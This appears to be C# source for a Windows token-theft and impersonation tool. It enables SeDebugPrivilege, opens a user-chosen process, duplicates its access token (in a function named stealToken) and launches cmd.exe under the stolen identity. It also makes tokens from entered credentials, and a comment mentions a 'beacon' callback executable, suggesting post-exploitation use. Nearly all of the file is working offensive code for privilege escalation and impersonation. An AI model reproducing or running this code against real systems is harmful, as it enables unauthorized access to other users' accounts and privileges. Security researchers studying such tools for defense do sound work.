private static IntPtr EnableAssignPrimaryTokenValue(IntPtr hToken)
{
WindowsAPIHelper.LUID luidSEAssignPrimaryTokenValue;
WindowsAPIHelper.TOKEN_PRIVILEGES tkpPrivileges;
if (!WindowsAPIHelper.LookupPrivilegeValue(null, WindowsAPIHelper.PrivilegeName.SE_ASSIGNPRIMARYTOKEN_NAME, out luidSEAssignPrimaryTokenValue))
{
Console.WriteLine("LookupPrivilegeValue() failed, error = {0} .SeAssignPrimaryToken is not available", Marshal.GetLastWin32Error());
WindowsAPIHelper.CloseHandle(hToken);
return(IntPtr.Zero);
}
else
{
Console.WriteLine("LookupPrivilegeValue() successfully");
}
tkpPrivileges.PrivilegeCount = 1;
tkpPrivileges.Luid = luidSEAssignPrimaryTokenValue;
tkpPrivileges.Attributes = WindowsAPIHelper.PrivilegeName.SE_PRIVILEGE_ENABLED;
if (!WindowsAPIHelper.AdjustTokenPrivileges(hToken, false, ref tkpPrivileges, 0, IntPtr.Zero, IntPtr.Zero))
{
Console.WriteLine("LookupPrivilegeValue() failed, error = {0} .Se Assign Primary Token is not available", Marshal.GetLastWin32Error());
}
else
{
Console.WriteLine("Se Assign Primary Token is now available");
}
return(hToken);
}
private static IntPtr attachProcess()
{
Console.Clear();
Process[] processes = Process.GetProcesses();
var procName = "list";
Console.WriteLine("Enter the ID of the process you want to impersonate.");
procName = Console.ReadLine();
Process targetProcess = null;
try
{
targetProcess = Process.GetProcessById(int.Parse(procName));
Console.WriteLine("Successfully Connected to process ID {0} - {1}", targetProcess.Id, targetProcess.ProcessName);
}
catch
{
Console.WriteLine("Failed to find process with ID: {0}", procName);
}
//Open a handle to the process
IntPtr ptr = WindowsAPIHelper.OpenProcess(WindowsAPIHelper.ProcessAccessFlags.All, false, targetProcess.Id);
if (ptr == IntPtr.Zero)
{
Console.WriteLine("OpenProcess Failed!");
}
else
{
Console.WriteLine("OpenProcess Succeeded: " + ptr.ToInt32().ToString());
}
return(ptr);
}
static void launchProcess(IntPtr duplicateToken)
{
//Run commands using that tokens Impersonation Context.
WindowsAPIHelper.PROCESS_INFORMATION pi = new WindowsAPIHelper.PROCESS_INFORMATION();
WindowsAPIHelper.STARTUPINFO si = new WindowsAPIHelper.STARTUPINFO();
si.cb = (uint)Marshal.SizeOf(si);
string process = @"C:\Windows\System32\cmd.exe";
Console.WriteLine("Launching Process: {0}", process);
if (WindowsAPIHelper.CreateProcessWithTokenW(duplicateToken, WindowsAPIHelper.LogonFlags.LOGON_NETCREDENTIALS_ONLY, process, null, WindowsAPIHelper.CreationFlags.CREATE_DEFAULT_ERROR_MODE, IntPtr.Zero, null, ref si, out pi))
{
Console.WriteLine("Process Launched");
}
else
{
Console.WriteLine("Failed to launch process: {0}", Marshal.GetLastWin32Error().ToString());
}
}
static void makeToken(ref IntPtr token, int SecurityImpersonate, ref IntPtr duplicateToken)
{
Console.WriteLine("Current User: {0}", WindowsIdentity.GetCurrent().Name);
Console.Write("Enter the user you want to impersonate: ");
string username = Console.ReadLine();
Console.Write("Enter the password for the user you want to impersonate: ");
SecureString password = GetPassword();
Console.WriteLine();
//Logon the user to get a context handle
if (WindowsAPIHelper.LogonUser(username, Environment.MachineName, ConvertToUnsecureString(password), (int)WindowsAPIHelper.Logon32Type.Interactive, (int)WindowsAPIHelper.Logon32Provider.Default, ref token) != 0)
{
WindowsAPIHelper.SECURITY_ATTRIBUTES sa = new WindowsAPIHelper.SECURITY_ATTRIBUTES();
//Duplicate the token stolen from the logon.
//Nee to update this to DuplicateTokenEx
if (WindowsAPIHelper.DuplicateTokenEx(token, (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED, ref sa, WindowsAPIHelper.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, WindowsAPIHelper.TOKEN_TYPE.TokenPrimary, out duplicateToken))
{
WindowsIdentity impersonatedUser = new WindowsIdentity(duplicateToken);
//Run commands using that tokens Impersonation Context.
using (WindowsImpersonationContext ImpersonationContext = impersonatedUser.Impersonate())
{
if (ImpersonationContext != null)
{
Console.WriteLine("After Impersonation Succeeded!\nUser: {0}\nSID: {1}", WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).Name, WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).User.Value);
}
}
}
else
{
Console.WriteLine("Unable to duplicate token!");
return;
}
}
else
{
Console.WriteLine("LogonUser failed! Are the credentials correct?");
return;
}
}
private static IntPtr enableSEDebugPrivilege()
{
IntPtr hToken = IntPtr.Zero;
WindowsAPIHelper.LUID luidSEDebugNameValue;
WindowsAPIHelper.TOKEN_PRIVILEGES tkpPrivileges;
if (!WindowsAPIHelper.OpenProcessToken(WindowsAPIHelper.GetCurrentProcess(), (uint)WindowsAPIHelper.DesiredAccess.TOKEN_ADJUST_PRIVILEGES | (uint)WindowsAPIHelper.DesiredAccess.TOKEN_QUERY, out hToken))
{
Console.WriteLine("OpenProcessToken() failed, error = {0} . SeDebugPrivilege is not available", Marshal.GetLastWin32Error());
return(IntPtr.Zero);
}
else
{
Console.WriteLine("OpenProcessToken() successfully");
}
if (!WindowsAPIHelper.LookupPrivilegeValue(null, WindowsAPIHelper.PrivilegeName.SE_DEBUG_NAME, out luidSEDebugNameValue))
{
Console.WriteLine("LookupPrivilegeValue() failed, error = {0} .SeDebugPrivilege is not available", Marshal.GetLastWin32Error());
WindowsAPIHelper.CloseHandle(hToken);
return(IntPtr.Zero);
}
else
{
Console.WriteLine("LookupPrivilegeValue() successfully");
}
tkpPrivileges.PrivilegeCount = 1;
tkpPrivileges.Luid = luidSEDebugNameValue;
tkpPrivileges.Attributes = WindowsAPIHelper.PrivilegeName.SE_PRIVILEGE_ENABLED;
if (!WindowsAPIHelper.AdjustTokenPrivileges(hToken, false, ref tkpPrivileges, 0, IntPtr.Zero, IntPtr.Zero))
{
Console.WriteLine("LookupPrivilegeValue() failed, error = {0} .SeDebugPrivilege is not available", Marshal.GetLastWin32Error());
}
else
{
Console.WriteLine("SeDebugPrivilege is now available");
}
return(hToken);
}
static void stealToken(ref IntPtr token, int SecurityImpersonate, ref IntPtr duplicateToken)
{
//Check for Debugging
Console.WriteLine("Current User: {0}", WindowsIdentity.GetCurrent().Name);
IntPtr hToken = enableSEDebugPrivilege();
IntPtr hHandle = attachProcess();
WindowsAPIHelper.OpenProcessToken(hHandle, (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED, out token);
WindowsAPIHelper.SECURITY_ATTRIBUTES sa = new WindowsAPIHelper.SECURITY_ATTRIBUTES();
Console.WriteLine("Stealing token...");
//Token Type needs to be Primary if launching a new process, Impersonation if changing ThreadToken (Possibly? How true is this?)
if (WindowsAPIHelper.DuplicateTokenEx(token, (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED, ref sa, WindowsAPIHelper.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, WindowsAPIHelper.TOKEN_TYPE.TokenImpersonation, out duplicateToken))
{
if (duplicateToken == IntPtr.Zero)
{
Console.WriteLine("Failed");
return;
}
WindowsIdentity impersonatedUser = new WindowsIdentity(duplicateToken);
//Run commands using that tokens Impersonation Context.
using (WindowsImpersonationContext ImpersonationContext = impersonatedUser.Impersonate())
{
if (ImpersonationContext != null)
{
Console.WriteLine("After Impersonation Succeeded!\nUser: {0}\nSID: {1}", WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).Name, WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).User.Value);
}
}
}
else
{
Console.WriteLine("Unable to duplicate token!");
return;
}
}
static void Main(string[] args)
{
int decision = displayMenu();
IntPtr token = IntPtr.Zero;
IntPtr duplicateToken = IntPtr.Zero;
const int SecurityImpersonate = 2;
if (decision == 2)
{
makeToken(ref token, SecurityImpersonate, ref duplicateToken);
launchProcess(token);
}
else if (decision == 1)
{
stealToken(ref token, SecurityImpersonate, ref duplicateToken);
}
else if (decision == 3)
{
//Need to test launch process with beacon or some other type of executable that calls back.
stealToken(ref token, SecurityImpersonate, ref duplicateToken);
WindowsIdentity impersonatedUser = new WindowsIdentity(duplicateToken);
launchProcess(duplicateToken);
}
else if (decision == 4)
{
rev2self();
}
else if (decision == 5)
{
stealToken(ref token, SecurityImpersonate, ref duplicateToken);
IntPtr hproc = Process.GetCurrentProcess().Handle;
Console.WriteLine(hproc.ToString());
try
{
Console.WriteLine("Before User: {0}", Environment.UserName);
if (WindowsAPIHelper.SetThreadToken(IntPtr.Zero, duplicateToken))
{
Console.WriteLine("After User: {0}", Environment.UserName);
}
else
{
Console.WriteLine("Failed, Error Code: {0}", Marshal.GetLastWin32Error().ToString());
}
Console.WriteLine("Reverting...");
Console.WriteLine("Current User: {0}", Environment.UserName);
WindowsAPIHelper.RevertToSelf();
Console.WriteLine("After: {0}", Environment.UserName);
}
catch
{
Console.WriteLine(Marshal.GetLastWin32Error().ToString());
}
Process.Start("cmd.exe", "");
}
else
{
Console.WriteLine("Womp");
}
Console.ReadLine();
}
